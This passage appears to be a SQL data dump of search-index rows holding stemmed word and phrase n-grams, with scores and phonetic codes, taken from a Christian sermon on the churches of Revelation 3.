(282413, 'resources but god', 'resourc but god', 0, 1, 1.5667, 'R2621323', 1, '*'),
(282414, 'resulted', 'result', 0, 0, 0.5333, 'R243', 1, '*'),
(282415, 'resulted to', 'result to', 0, 1, 1.3667, 'R243', 1, '*'),
(282416, 'resulted to fig', 'result to fig', 0, 1, 1.5, 'R24312', 1, '*'),
(282417, 'returns', 'return', 0, 0, 0.4667, 'R3652', 1, '*'),
(282418, 'returns we', 'return we', 0, 1, 1.3333, 'R3652', 1, '*'),
(282419, 'returns we must', 'return we must', 0, 1, 1.5, 'R3652523', 1, '*'),
(282420, 'rev 3 14-22', 'rev 3 14-22', 0, 1, 1.3667, 'R100', 1, '*'),
(282421, 'rev 3 7-22', 'rev 3 7-22', 0, 1, 1.3333, 'R100', 1, '*'),
(282422, 'rev 3 v.12', 'rev 3 v.12', 0, 1, 1.3333, 'R100', 1, '*'),
(282423, 'rev 4', 'rev 4', 0, 1, 1.1667, 'R100', 1, '*'),
(282424, 'rev 4 v.1', 'rev 4 v.1', 0, 1, 1.3, 'R100', 1, '*'),
(282425, 'riches and', 'rich and', 0, 1, 1.3333, 'R253', 1, '*'),
(282426, 'riches and pride', 'rich and pride', 0, 1, 1.5333, 'R253163', 1, '*'),
(282427, 'said that', 'said that', 0, 1, 1.3, 'S300', 1, '*'),
(282428, 'said that they', 'said that they', 0, 1, 1.4667, 'S300', 1, '*'),
(282429, 'said their', 'said their', 0, 1, 1.3333, 'S360', 1, '*'),
(282430, 'said their condition', 'said their condition', 0, 1, 1.6667, 'S362535', 1, '*'),
(282431, 'said to have', 'said to have', 0, 1, 1.4, 'S310', 1, '*'),
(282432, 'satan and someone', 'satan and someone', 0, 1, 1.5667, 'S35325', 1, '*'),
(282433, 'satan if the', 'satan if the', 0, 1, 1.4, 'S3513', 1, '*'),
(282434, 'satan is', 'satan is', 0, 1, 1.2667, 'S352', 1, '*'),
(282435, 'satan is just', 'satan is just', 0, 1, 1.4333, 'S3523', 1, '*'),
(282436, 'scripture an', 'scriptur an', 0, 1, 1.4, 'S61365', 1, '*'),
(282437, 'scripture an open', 'scriptur an open', 0, 1, 1.5667, 'S6136515', 1, '*'),
(282438, 'serious do', 'seriou do', 0, 1, 1.3333, 'S623', 1, '*'),
(282439, 'serious do you', 'seriou do you', 0, 1, 1.4667, 'S623', 1, '*'),
(282440, 'service for', 'servic for', 0, 1, 1.3667, 'S61216', 1, '*'),
(282441, 'service for the', 'servic for the', 0, 1, 1.5, 'S612163', 1, '*'),
(282442, 'services', 'servic', 0, 0, 0.5333, 'S612', 2, '*'),
(282443, 'services are', 'servic are', 0, 1, 1.4, 'S6126', 1, '*'),
(282444, 'services are you', 'servic are you', 0, 1, 1.5333, 'S6126', 1, '*'),
(282445, 'serving', 'serv', 0, 0, 0.4667, 'S6152', 2, '*'),
(282446, 'serving jesus', 'serv jesus', 0, 1, 1.4333, 'S6152', 1, '*'),
(282447, 'serving jesus and', 'serv jesus and', 0, 1, 1.5667, 'S615253', 1, '*'),
(282448, 'set on', 'set on', 0, 1, 1.2, 'S350', 1, '*'),
(282449, 'set on the', 'set on the', 0, 1, 1.3333, 'S353', 1, '*'),
(282450, 'several churches', 'sever churches', 0, 1, 1.5333, 'S164262', 1, '*'),
(282451, 'several churches to', 'sever churches to', 0, 1, 1.6333, 'S1642623', 1, '*'),
(282452, 'shows 2', 'show 2', 0, 1, 1.2333, 'S000', 1, '*'),
(282453, 'shows 2 blind', 'show 2 blind', 0, 1, 1.4333, 'S1453', 1, '*'),
(282454, 'small in', 'small in', 0, 1, 1.2667, 'S545', 1, '*'),
(282455, 'small in number', 'small in number', 0, 1, 1.5, 'S54516', 1, '*'),
(282456, 'someone who', 'someon who', 0, 1, 1.3667, 'S500', 1, '*'),
(282457, 'someone who follows', 'someon who follows', 0, 1, 1.6333, 'S5142', 1, '*'),
(282458, 'someone who pretends', 'someon who pretends', 0, 1, 1.6667, 'S5163532', 1, '*'),
(282459, 'spending time in', 'spend time in', 0, 1, 1.5333, 'S1535235', 1, '*'),
(282460, 'spiritual insensitivity', 'spiritu insensitivity', 0, 1, 1.7667, 'S16345252313', 1, '*'),
(282461, 'spiritual insensitivity blindness', 'spiritu insensitivity blindness', 0, 1, 2, 'S16345252313145352', 1, '*'),
(282462, 'spiritual warrior', 'spiritu warrior', 0, 1, 1.5667, 'S16346', 1, '*'),
(282463, 'spiritual warrior who', 'spiritu warrior who', 0, 1, 1.7, 'S16346', 1, '*'),
(282464, 'spiritually lukewarm', 'spiritu lukewarm', 0, 1, 1.6667, 'S1634265', 1, '*'),
(282465, 'spiritually lukewarm and', 'spiritu lukewarm and', 0, 1, 1.8, 'S16342653', 1, '*'),
(282466, 'stand for', 'stand for', 0, 1, 1.3, 'S35316', 1, '*'),
(282467, 'stand for god\'s', 'stand for god', 0, 1, 1.5, 'S35316232', 1, '*'),
(282468, 'stands', 'stand', 0, 0, 0.4, 'S3532', 1, '*'),
(282469, 'stands at', 'stand at', 0, 1, 1.3, 'S35323', 1, '*'),
(282470, 'stands at the', 'stand at the', 0, 1, 1.4333, 'S35323', 1, '*'),
(282471, 'start a fresh', 'start a fresh', 0, 1, 1.4333, 'S363162', 1, '*'),
(282472, 'stolen', 'stolen', 0, 0, 0.4, 'S345', 1, '*'),
(282473, 'stolen from', 'stolen from', 0, 1, 1.3667, 'S345165', 1, '*'),
(282474, 'stolen from christians\'', 'stolen from christians', 0, 1, 1.7667, 'S345165262352', 1, '*'),
(282475, 'strength but', 'strength but', 0, 1, 1.4, 'S3652313', 1, '*'),
(282476, 'strength but god', 'strength but god', 0, 1, 1.5333, 'S365231323', 1, '*'),
(282477, 'strength but they', 'strength but they', 0, 1, 1.5667, 'S3652313', 1, '*'),
(282478, 'strength the', 'strength the', 0, 1, 1.4, 'S36523', 1, '*'),
(282479, 'strength the word', 'strength the word', 0, 1, 1.5667, 'S3652363', 1, '*'),
(282480, 'strength they', 'strength they', 0, 1, 1.4333, 'S36523', 1, '*'),
(282481, 'strength they kept', 'strength they kept', 0, 1, 1.6, 'S36523213', 1, '*'),
(282482, 'strong and mighty', 'strong and mighty', 0, 1, 1.5667, 'S365253523', 1, '*'),
(282483, 'strong they', 'strong they', 0, 1, 1.3667, 'S36523', 1, '*'),
(282484, 'strong they are', 'strong they are', 0, 1, 1.5, 'S365236', 1, '*'),
(282485, 'such assumption', 'such assumption', 0, 1, 1.5, 'S5135', 1, '*'),
(282486, 'such assumption read', 'such assumption read', 0, 1, 1.6667, 'S513563', 1, '*'),
(282487, 'such kind', 'such kind', 0, 1, 1.3, 'S530', 1, '*'),
(282488, 'such kind christians', 'such kind christians', 0, 1, 1.6667, 'S53262352', 1, '*'),
(282489, 'such people', 'such people', 0, 1, 1.3667, 'S140', 1, '*'),
(282490, 'such people is', 'such people is', 0, 1, 1.4667, 'S142', 1, '*'),
(282491, 'synagogue', 'synagogu', 0, 0, 0.6, 'S520', 1, '*'),
(282492, 'synagogue of', 'synagogu of', 0, 1, 1.4, 'S521', 1, '*'),
(282493, 'synagogue of satan', 'synagogu of satan', 0, 1, 1.6, 'S521235', 1, '*'),
(282494, 'take in', 'take in', 0, 1, 1.2333, 'T250', 1, '*'),
(282495, 'take in these', 'take in these', 0, 1, 1.4333, 'T2532', 1, '*'),
(282496, 'take the assignments', 'take the assignments', 0, 1, 1.6667, 'T232532', 1, '*'),
(282497, 'take the name', 'take the name', 0, 1, 1.4333, 'T235', 1, '*'),
(282498, 'taught', 'taught', 0, 0, 0.4, 'T230', 1, '*'),
(282499, 'taught and', 'taught and', 0, 1, 1.3333, 'T2353', 1, '*'),
(282500, 'taught and received', 'taught and received', 0, 1, 1.6333, 'T23536213', 1, '*'),
(282501, 'teachers', 'teacher', 0, 0, 0.5333, 'T262', 1, '*'),
(282502, 'teachers they', 'teacher they', 0, 1, 1.4333, 'T2623', 1, '*'),
(282503, 'teachers they have', 'teacher they have', 0, 1, 1.6, 'T26231', 1, '*'),
(282504, 'tells this', 'tell this', 0, 1, 1.3333, 'T4232', 1, '*'),
(282505, 'tells this church', 'tell this church', 0, 1, 1.5667, 'T423262', 1, '*'),
(282506, 'temple of', 'templ of', 0, 1, 1.3, 'T5141', 1, '*'),
(282507, 'temple of god', 'templ of god', 0, 1, 1.4333, 'T514123', 1, '*'),
(282508, 'temptation', 'temptat', 0, 0, 0.6667, 'T5135', 1, '*'),
(282509, 'temptation this', 'temptat this', 0, 1, 1.5, 'T513532', 1, '*'),
(282510, 'temptation this refers', 'temptat this refers', 0, 1, 1.7333, 'T5135326162', 1, '*'),
(282511, 'that a christian', 'that a christian', 0, 1, 1.5333, 'T26235', 1, '*'),
(282512, 'that could', 'that could', 0, 1, 1.3333, 'T243', 2, '*'),
(282513, 'that could take', 'that could take', 0, 1, 1.5, 'T2432', 1, '*'),
(282514, 'that have once', 'that have once', 0, 1, 1.4667, 'T152', 1, '*'),
(282515, 'that they do', 'that they do', 0, 1, 1.4, 'T000', 1, '*'),
(282516, 'that violates divine', 'that violates divine', 0, 1, 1.6667, 'T1432315', 1, '*'),
(282517, 'the assignments', 'the assignments', 0, 1, 1.5, 'T2532', 1, '*'),
(282518, 'the assignments in', 'the assignments in', 0, 1, 1.6, 'T25325', 1, '*'),
(282519, 'the believers at', 'the believers at', 0, 1, 1.5333, 'T141623', 1, '*'),
(282520, 'the christians', 'the christians', 0, 1, 1.4667, 'T262352', 1, '*'),
(282521, 'the christians in', 'the christians in', 0, 1, 1.5667, 'T2623525', 1, '*'),
(282522, 'the church in', 'the church in', 0, 1, 1.4333, 'T2625', 1, '*'),
(282523, 'the church rev', 'the church rev', 0, 1, 1.4667, 'T26261', 1, '*'),
(282524, 'the condition', 'the condition', 0, 1, 1.4333, 'T2535', 1, '*'),
(282525, 'the condition of', 'the condition of', 0, 1, 1.5333, 'T25351', 1, '*'),
(282526, 'the description', 'the description', 0, 1, 1.5, 'T26135', 1, '*'),
(282527, 'the description of', 'the description of', 0, 1, 1.6, 'T261351', 1, '*'),
(282528, 'the door', 'the door', 0, 1, 1.2667, 'T600', 1, '*'),
(282529, 'the door knocking', 'the door knocking', 0, 1, 1.5667, 'T625252', 1, '*'),
(282530, 'the door of', 'the door of', 0, 1, 1.3667, 'T610', 1, '*'),
(282531, 'the earthly', 'the earthly', 0, 1, 1.3667, 'T634', 1, '*'),
(282532, 'the earthly shows', 'the earthly shows', 0, 1, 1.5667, 'T6342', 1, '*'),
(282533, 'the garden but', 'the garden but', 0, 1, 1.4667, 'T263513', 1, '*'),
(282534, 'the gospel acts', 'the gospel acts', 0, 1, 1.5, 'T214232', 1, '*'),
(282535, 'the great tribulation', 'the great tribulation', 0, 1, 1.7, 'T26361435', 1, '*'),
(282536, 'the hour', 'the hour', 0, 1, 1.2667, 'T600', 1, '*'),
(282537, 'the hour of', 'the hour of', 0, 1, 1.3667, 'T610', 1, '*'),
(282538, 'the laodicea', 'the laodicea', 0, 1, 1.4, 'T432', 1, '*'),
(282539, 'the laodicea christians', 'the laodicea christians', 0, 1, 1.7667, 'T43262352', 1, '*'),
(282540, 'the lord covered', 'the lord covered', 0, 1, 1.5333, 'T4632163', 1, '*'),
(282541, 'the position', 'the position', 0, 1, 1.4, 'T1235', 1, '*'),
(282542, 'the position that', 'the position that', 0, 1, 1.5667, 'T12353', 1, '*'),
(282543, 'the synagogue', 'the synagogue', 0, 1, 1.4333, 'T252', 1, '*'),
(282544, 'the synagogue of', 'the synagogue of', 0, 1, 1.5333, 'T2521', 1, '*'),
(282545, 'the temple of', 'the temple of', 0, 1, 1.4333, 'T5141', 1, '*'),
(282546, 'the true word', 'the true word', 0, 1, 1.4333, 'T630', 1, '*'),
(282547, 'the word how', 'the word how', 0, 1, 1.4, 'T630', 1, '*'),
(282548, 'their condition', 'their condition', 0, 1, 1.5, 'T62535', 1, '*'),
(282549, 'their condition must', 'their condition must', 0, 1, 1.6667, 'T6253523', 1, '*'),
(282550, 'their lord', 'their lord', 0, 1, 1.3333, 'T6463', 1, '*'),
(282551, 'their lord they', 'their lord they', 0, 1, 1.5, 'T6463', 1, '*'),
(282552, 'their luke', 'their luke', 0, 1, 1.3333, 'T642', 1, '*'),
(282553, 'their luke warmness', 'their luke warmness', 0, 1, 1.6333, 'T642652', 1, '*'),
(282554, 'their mouth', 'their mouth', 0, 1, 1.3667, 'T653', 1, '*'),
(282555, 'their mouth god\'s', 'their mouth god', 0, 1, 1.5667, 'T653232', 1, '*'),
(282556, 'their nakedness', 'their nakedness', 0, 1, 1.5, 'T652352', 1, '*'),
(282557, 'their nakedness the', 'their nakedness the', 0, 1, 1.6333, 'T6523523', 1, '*'),
(282558, 'their problem', 'their problem', 0, 1, 1.4333, 'T616145', 1, '*'),
(282559, 'their problem is', 'their problem is', 0, 1, 1.5333, 'T6161452', 1, '*'),
(282560, 'them how', 'them how', 0, 1, 1.2667, 'T500', 1, '*'),
(282561, 'them how many', 'them how many', 0, 1, 1.4333, 'T500', 1, '*'),
(282562, 'them strong', 'them strong', 0, 1, 1.3667, 'T523652', 1, '*'),
(282563, 'them strong they', 'them strong they', 0, 1, 1.5333, 'T5236523', 1, '*'),
(282564, 'there is always', 'there is always', 0, 1, 1.5, 'T6242', 1, '*'),
(282565, 'there was nothing', 'there was nothing', 0, 1, 1.5667, 'T625352', 1, '*'),
(282566, 'therefore promised', 'therefor promised', 0, 1, 1.6, 'T61616523', 1, '*'),
(282567, 'therefore promised that', 'therefor promised that', 0, 1, 1.7667, 'T61616523', 1, '*'),
(282568, 'these christians', 'these christians', 0, 1, 1.5333, 'T262352', 1, '*'),
(282569, 'these christians have', 'these christians have', 0, 1, 1.7, 'T2623521', 1, '*'),
(282570, 'these end', 'these end', 0, 1, 1.3, 'T253', 1, '*'),
(282571, 'these end times', 'these end times', 0, 1, 1.5, 'T25352', 1, '*'),
(282572, 'these questions', 'these questions', 0, 1, 1.5, 'T2352', 1, '*'),
(282573, 'these questions are', 'these questions are', 0, 1, 1.6333, 'T23526', 1, '*'),
(282574, 'they are promised', 'thei are promised', 0, 1, 1.5667, 'T616523', 1, '*'),
(282575, 'they are said', 'thei are said', 0, 1, 1.4333, 'T623', 1, '*'),
(282576, 'they do', 'thei do', 0, 1, 1.2333, 'T000', 1, '*'),
(282577, 'they do not', 'thei do not', 0, 1, 1.3667, 'T530', 1, '*'),
(282578, 'they had', 'thei had', 0, 1, 1.2667, 'T000', 1, '*'),
(282579, 'they had achieved', 'thei had achieved', 0, 1, 1.5667, 'T213', 1, '*'),
(282580, 'they have had', 'thei have had', 0, 1, 1.4333, 'T130', 1, '*'),
(282581, 'they have little', 'thei have little', 0, 1, 1.5333, 'T1434', 1, '*'),
(282582, 'they have not', 'thei have not', 0, 1, 1.4333, 'T153', 1, '*'),
(282583, 'they have really', 'thei have really', 0, 1, 1.5333, 'T164', 1, '*'),
(282584, 'they kept', 'thei kept', 0, 1, 1.3, 'T213', 1, '*'),
(282585, 'they kept the', 'thei kept the', 0, 1, 1.4333, 'T213', 1, '*'),
(282586, 'they lost', 'thei lost', 0, 1, 1.3, 'T423', 1, '*'),
(282587, 'they lost it', 'thei lost it', 0, 1, 1.4, 'T423', 1, '*'),
(282588, 'they lost the', 'thei lost the', 0, 1, 1.4333, 'T423', 1, '*'),
(282589, 'they resulted', 'thei resulted', 0, 1, 1.4333, 'T6243', 1, '*'),
(282590, 'they resulted to', 'thei resulted to', 0, 1, 1.5333, 'T6243', 1, '*'),
(282591, 'they will become', 'thei will become', 0, 1, 1.5333, 'T4125', 1, '*'),
(282592, 'things that the', 'thing that the', 0, 1, 1.5, 'T523', 1, '*'),
(282593, 'this because he', 'thi because he', 0, 1, 1.5, 'T212', 1, '*'),
(282594, 'this church', 'thi church', 0, 1, 1.3667, 'T262', 1, '*'),
(282595, 'this church may', 'thi church may', 0, 1, 1.5, 'T2625', 1, '*'),
(282596, 'this church to', 'thi church to', 0, 1, 1.4667, 'T2623', 1, '*'),
(282597, 'this is spiritual', 'thi is spiritual', 0, 1, 1.5667, 'T21634', 1, '*'),
(282598, 'this is what', 'thi is what', 0, 1, 1.4, 'T230', 1, '*'),
(282599, 'those that have', 'those that have', 0, 1, 1.5, 'T231', 2, '*'),
(282600, 'three major', 'three major', 0, 1, 1.3667, 'T6526', 1, '*'),
(282601, 'three major things', 'three major things', 0, 1, 1.6, 'T6526352', 1, '*'),
(282602, 'through every', 'through every', 0, 1, 1.4333, 'T6216', 1, '*'),
(282603, 'through every door', 'through every door', 0, 1, 1.6, 'T621636', 1, '*'),
(282604, 'time in prayer', 'time in prayer', 0, 1, 1.4667, 'T516', 1, '*'),
(282605, 'times god', 'time god', 0, 1, 1.3, 'T523', 1, '*'),
(282606, 'times god is', 'time god is', 0, 1, 1.4, 'T5232', 1, '*'),
(282607, 'to advance', 'to advance', 0, 1, 1.3333, 'T152', 1, '*'),
(282608, 'to advance at', 'to advance at', 0, 1, 1.4333, 'T1523', 1, '*'),
(282609, 'to an', 'to an', 0, 1, 1.1667, 'T500', 1, '*'),
(282610, 'to an opening', 'to an opening', 0, 1, 1.4333, 'T5152', 1, '*'),
(282611, 'to continue', 'to continue', 0, 1, 1.3667, 'T2535', 1, '*'),
(282612, 'to continue like', 'to continue like', 0, 1, 1.5333, 'T253542', 1, '*'),
(282613, 'to evangelism', 'to evangelism', 0, 1, 1.4333, 'T152425', 1, '*'),
(282614, 'to evangelism are', 'to evangelism are', 0, 1, 1.5667, 'T1524256', 1, '*'),
(282615, 'to fig', 'to fig', 0, 1, 1.2, 'T120', 1, '*'),
(282616, 'to fig leaves', 'to fig leaves', 0, 1, 1.4333, 'T12412', 1, '*'),
(282617, 'to get excited', 'to get excited', 0, 1, 1.4667, 'T2323', 1, '*'),
(282618, 'to have strength', 'to have strength', 0, 1, 1.5333, 'T1236523', 1, '*'),
(282619, 'to living', 'to living', 0, 1, 1.3, 'T4152', 1, '*'),
(282620, 'to living a', 'to living a', 0, 1, 1.3667, 'T4152', 1, '*'),
(282621, 'to make them', 'to make them', 0, 1, 1.4, 'T5235', 1, '*'),
(282622, 'to preach', 'to preach', 0, 1, 1.3, 'T162', 1, '*'),
(282623, 'to preach the', 'to preach the', 0, 1, 1.4333, 'T1623', 1, '*'),
(282624, 'to spending', 'to spending', 0, 1, 1.3667, 'T215352', 1, '*'),
(282625, 'to spending time', 'to spending time', 0, 1, 1.5333, 'T21535235', 1, '*'),
(282626, 'to such', 'to such', 0, 1, 1.2333, 'T200', 2, '*'),
(282627, 'to such people', 'to such people', 0, 1, 1.4667, 'T214', 1, '*'),
(282628, 'to synagogue', 'to synagogue', 0, 1, 1.4, 'T252', 1, '*'),
(282629, 'to synagogue of', 'to synagogue of', 0, 1, 1.5, 'T2521', 1, '*'),
(282630, 'to the great', 'to the great', 0, 1, 1.4, 'T263', 1, '*'),
(282631, 'to the things', 'to the things', 0, 1, 1.4333, 'T520', 1, '*'),
(282632, 'to walk through', 'to walk through', 0, 1, 1.5, 'T42362', 1, '*'),
(282633, 'to you and', 'to you and', 0, 1, 1.3333, 'T530', 1, '*'),
(282634, 'to your local', 'to your local', 0, 1, 1.4333, 'T6424', 1, '*'),
(282635, 'today and he', 'todai and he', 0, 1, 1.4, 'T530', 1, '*'),
(282636, 'treasures', 'treasur', 0, 0, 0.6, 'T6262', 1, '*'),
(282637, 'treasures you', 'treasur you', 0, 1, 1.4333, 'T6262', 1, '*'),
(282638, 'treasures you laid', 'treasur you laid', 0, 1, 1.6, 'T626243', 1, '*'),
(282639, 'tremendous', 'tremend', 0, 0, 0.6667, 'T6532', 1, '*'),
(282640, 'tremendous doors', 'tremend doors', 0, 1, 1.5333, 'T6532362', 1, '*'),
(282641, 'tremendous doors of', 'tremend doors of', 0, 1, 1.6333, 'T65323621', 1, '*'),
(282642, 'tribulation described', 'tribul described', 0, 1, 1.7, 'T6143532613', 1, '*'),
(282643, 'tribulation described in', 'tribul described in', 0, 1, 1.8, 'T61435326135', 1, '*'),
(282644, 'true christians', 'true christians', 0, 1, 1.5, 'T6262352', 1, '*'),
(282645, 'true christians who', 'true christians who', 0, 1, 1.6333, 'T6262352', 1, '*'),
(282646, 'true wealth', 'true wealth', 0, 1, 1.3667, 'T643', 1, '*'),
(282647, 'true wealth is', 'true wealth is', 0, 1, 1.4667, 'T6432', 1, '*'),
(282648, 'true word', 'true word', 0, 1, 1.3, 'T630', 1, '*'),
(282649, 'true word of', 'true word of', 0, 1, 1.4, 'T631', 1, '*'),
(282650, 'turned', 'turn', 0, 0, 0.4, 'T653', 1, '*'),
(282651, 'turned several', 'turn several', 0, 1, 1.4667, 'T6532164', 1, '*'),
(282652, 'turned several churches', 'turn several churches', 0, 1, 1.7667, 'T6532164262', 1, '*'),
(282653, 'unto the work', 'unto the work', 0, 1, 1.4333, 'U5362', 1, '*'),
(282654, 'up in heaven', 'up in heaven', 0, 1, 1.4, 'U1515', 1, '*'),
(282655, 'up in your', 'up in your', 0, 1, 1.3333, 'U156', 2, '*'),
(282656, 'us are', 'us are', 0, 1, 1.2, 'U260', 1, '*'),
(282657, 'us are living', 'us are living', 0, 1, 1.4333, 'U264152', 1, '*'),
(282658, 'v.1', 'v.1', 0, 0, 0.2, 'V000', 1, '*'),
(282659, 'v.1 there', 'v.1 there', 0, 1, 1.3, 'V360', 1, '*'),
(282660, 'v.1 there is', 'v.1 there is', 0, 1, 1.4, 'V362', 1, '*'),
(282661, 'v.12', 'v.12', 0, 0, 0.2667, 'V000', 1, '*'),
(282662, 'v.12 this', 'v.12 this', 0, 1, 1.3, 'V320', 1, '*'),
(282663, 'v.12 this church', 'v.12 this church', 0, 1, 1.5333, 'V3262', 1, '*'),
(282664, 'v.19-20', 'v.19-20', 0, 0, 0.4667, 'V000', 1, '*'),
(282665, 'v.19-20 and', 'v.19-20 and', 0, 1, 1.3667, 'V530', 1, '*'),
(282666, 'v.19-20 and the', 'v.19-20 and the', 0, 1, 1.5, 'V530', 1, '*'),
(282667, 'violates divine', 'violat divine', 0, 1, 1.5, 'V432315', 1, '*'),
(282668, 'violates divine instructions', 'violat divine instructions', 0, 1, 1.9333, 'V4323152362352', 1, '*'),
(282669, 'voice and open', 'voic and open', 0, 1, 1.4667, 'V25315', 1, '*'),
(282670, 'vs 15-22', 'vs 15-22', 0, 1, 1.2667, 'V200', 1, '*'),
(282671, 'vs 15-22 in', 'vs 15-22 in', 0, 1, 1.3667, 'V250', 1, '*'),
(282672, 'walk through', 'walk through', 0, 1, 1.4, 'W42362', 1, '*'),
(282673, 'walk through every', 'walk through every', 0, 1, 1.6, 'W4236216', 1, '*'),
(282674, 'warmness', 'warm', 0, 0, 0.5333, 'W652', 1, '*'),
(282675, 'warmness when', 'warm when', 0, 1, 1.4333, 'W6525', 1, '*'),
(282676, 'warmness when jesus', 'warm when jesus', 0, 1, 1.6333, 'W65252', 1, '*'),
(282677, 'warrior', 'warrior', 0, 0, 0.4667, 'W600', 1, '*'),
(282678, 'warrior who', 'warrior who', 0, 1, 1.3667, 'W600', 1, '*'),
(282679, 'warrior who is', 'warrior who is', 0, 1, 1.4667, 'W620', 1, '*'),
(282680, 'was going', 'wa going', 0, 1, 1.3, 'W252', 2, '*'),
(282681, 'was going to', 'wa going to', 0, 1, 1.4, 'W2523', 2, '*'),
(282682, 'was nothing', 'wa nothing', 0, 1, 1.3667, 'W25352', 1, '*'),
(282683, 'was nothing that', 'wa nothing that', 0, 1, 1.5333, 'W253523', 1, '*'),
(282684, 'wealth is', 'wealth is', 0, 1, 1.3, 'W432', 1, '*'),
(282685, 'wealth is in', 'wealth is in', 0, 1, 1.4, 'W4325', 1, '*'),
(282686, 'were spiritually', 'were spiritually', 0, 1, 1.5333, 'W621634', 1, '*'),
(282687, 'were spiritually lukewarm', 'were spiritually lukewarm', 0, 1, 1.8333, 'W621634265', 1, '*'),
(282688, 'what happens to', 'what happens to', 0, 1, 1.5, 'W31523', 1, '*'),
(282689, 'what is holding', 'what is holding', 0, 1, 1.5, 'W324352', 1, '*'),
(282690, 'when jesus', 'when jesus', 0, 1, 1.3333, 'W520', 1, '*'),
(282691, 'when jesus returns', 'when jesus returns', 0, 1, 1.6, 'W5263652', 1, '*'),
(282692, 'when no man', 'when no man', 0, 1, 1.3667, 'W500', 1, '*'),
(282693, 'when they lost', 'when they lost', 0, 1, 1.4667, 'W53423', 1, '*'),
(282694, 'where god', 'where god', 0, 1, 1.3, 'W623', 2, '*'),
(282695, 'where god is', 'where god is', 0, 1, 1.4, 'W6232', 1, '*'),
(282696, 'which could', 'which could', 0, 1, 1.3667, 'W243', 1, '*'),
(282697, 'which could not', 'which could not', 0, 1, 1.5, 'W24353', 1, '*'),
(282698, 'who follows', 'who follows', 0, 1, 1.3667, 'W142', 1, '*'),
(282699, 'who follows satan', 'who follows satan', 0, 1, 1.5667, 'W14235', 1, '*'),
(282700, 'who is able', 'who is able', 0, 1, 1.3667, 'W214', 1, '*'),
(282701, 'who pretends', 'who pretends', 0, 1, 1.4, 'W163532', 1, '*'),
(282702, 'who pretends to', 'who pretends to', 0, 1, 1.5, 'W1635323', 1, '*'),
(282703, 'who stand', 'who stand', 0, 1, 1.3, 'W2353', 1, '*'),
(282704, 'who stand for', 'who stand for', 0, 1, 1.4333, 'W235316', 1, '*'),
(282705, 'will become', 'will become', 0, 1, 1.3667, 'W4125', 2, '*'),
(282706, 'will become pillars', 'will become pillars', 0, 1, 1.6333, 'W41251462', 1, '*'),
(282707, 'will come in', 'will come in', 0, 1, 1.4, 'W425', 1, '*'),
(282708, 'will dine', 'will dine', 0, 1, 1.3, 'W435', 1, '*'),
(282709, 'will dine with', 'will dine with', 0, 1, 1.4667, 'W4353', 1, '*'),
(282710, 'with such', 'with such', 0, 1, 1.3, 'W320', 1, '*'),
(282711, 'with such assumption', 'with such assumption', 0, 1, 1.6667, 'W325135', 1, '*'),
(282712, 'with you he', 'with you he', 0, 1, 1.3667, 'W300', 2, '*'),
(282713, 'word and his', 'word and his', 0, 1, 1.4, 'W63532', 1, '*'),
(282714, 'word how', 'word how', 0, 1, 1.2667, 'W630', 1, '*'),
(282715, 'word how serious', 'word how serious', 0, 1, 1.5333, 'W63262', 1, '*'),
(282716, 'work for the', 'work for the', 0, 1, 1.4, 'W62163', 1, '*'),
(282717, 'work john', 'work john', 0, 1, 1.3, 'W625', 1, '*'),
(282718, 'work john 9', 'work john 9', 0, 1, 1.3667, 'W625', 1, '*'),
(282719, 'working work', 'work work', 0, 1, 1.4, 'W625262', 1, '*'),
(282720, 'working work for', 'work work for', 0, 1, 1.5333, 'W62526216', 1, '*'),
(282721, 'worship and', 'worship and', 0, 1, 1.3667, 'W62153', 1, '*'),
(282722, 'worship and the', 'worship and the', 0, 1, 1.5, 'W62153', 1, '*'),
(282723, 'worship where', 'worship where', 0, 1, 1.4333, 'W6216', 1, '*'),
(282724, 'worship where god', 'worship where god', 0, 1, 1.5667, 'W621623', 1, '*'),
(282725, 'yet they', 'yet they', 0, 1, 1.2667, 'Y300', 1, '*'),
(282726, 'yet they have', 'yet they have', 0, 1, 1.4333, 'Y310', 1, '*'),
(282727, 'you a strong', 'you a strong', 0, 1, 1.4, 'Y23652', 1, '*'),
(282728, 'you and will', 'you and will', 0, 1, 1.4, 'Y534', 1, '*'),
(282729, 'you are lukewarm', 'you are lukewarm', 0, 1, 1.5333, 'Y64265', 1, '*'),
(282730, 'you back', 'you back', 0, 1, 1.2667, 'Y120', 2, '*'),
(282731, 'you back from', 'you back from', 0, 1, 1.4333, 'Y12165', 1, '*'),
(282732, 'you can hear', 'you can hear', 0, 1, 1.4, 'Y256', 1, '*'),
(282733, 'you committed', 'you committed', 0, 1, 1.4333, 'Y253', 1, '*'),
(282734, 'you committed to', 'you committed to', 0, 1, 1.5333, 'Y253', 1, '*'),
(282735, 'you have only', 'you have only', 0, 1, 1.4333, 'Y154', 1, '*'),
(282736, 'you he does', 'you he does', 0, 1, 1.3667, 'Y320', 1, '*'),
(282737, 'you is being', 'you is being', 0, 1, 1.4, 'Y2152', 1, '*'),
(282738, 'you know if', 'you know if', 0, 1, 1.3667, 'Y251', 1, '*'),
(282739, 'you laid', 'you laid', 0, 1, 1.2667, 'Y430', 1, '*'),
(282740, 'you laid up', 'you laid up', 0, 1, 1.3667, 'Y431', 1, '*'),
(282741, 'you may feel', 'you may feel', 0, 1, 1.4, 'Y514', 1, '*'),
(282742, 'you start a', 'you start a', 0, 1, 1.3667, 'Y2363', 1, '*'),
(282743, 'you to continue', 'you to continue', 0, 1, 1.5, 'Y32535', 1, '*'),
(282744, 'you what is', 'you what is', 0, 1, 1.3667, 'Y320', 1, '*'),
(282745, 'your christian', 'your christian', 0, 1, 1.4667, 'Y626235', 1, '*'),
(282746, 'your christian journey', 'your christian journey', 0, 1, 1.7333, 'Y626235265', 1, '*'),
(282747, 'your hand', 'your hand', 0, 1, 1.3, 'Y653', 1, '*'),
(282748, 'your hand among', 'your hand among', 0, 1, 1.5, 'Y65352', 1, '*'),
(282749, 'your health or', 'your health or', 0, 1, 1.4667, 'Y6436', 1, '*'),
(282750, 'your heart set', 'your heart set', 0, 1, 1.4667, 'Y6323', 1, '*'),
(282751, 'your life he', 'your life he', 0, 1, 1.4, 'Y641', 1, '*'),
(282752, 'your local', 'your local', 0, 1, 1.3333, 'Y6424', 1, '*'),
(282753, 'your local church', 'your local church', 0, 1, 1.5667, 'Y6424262', 1, '*'),
(282754, 'your true', 'your true', 0, 1, 1.3, 'Y636', 1, '*'),
(282755, 'your true wealth', 'your true wealth', 0, 1, 1.5333, 'Y63643', 1, '*'),
(282756, 'yourself these', 'yourself these', 0, 1, 1.4667, 'Y624132', 1, '*'),
(282757, 'yourself these questions', 'yourself these questions', 0, 1, 1.8, 'Y624132352', 1, '*'),
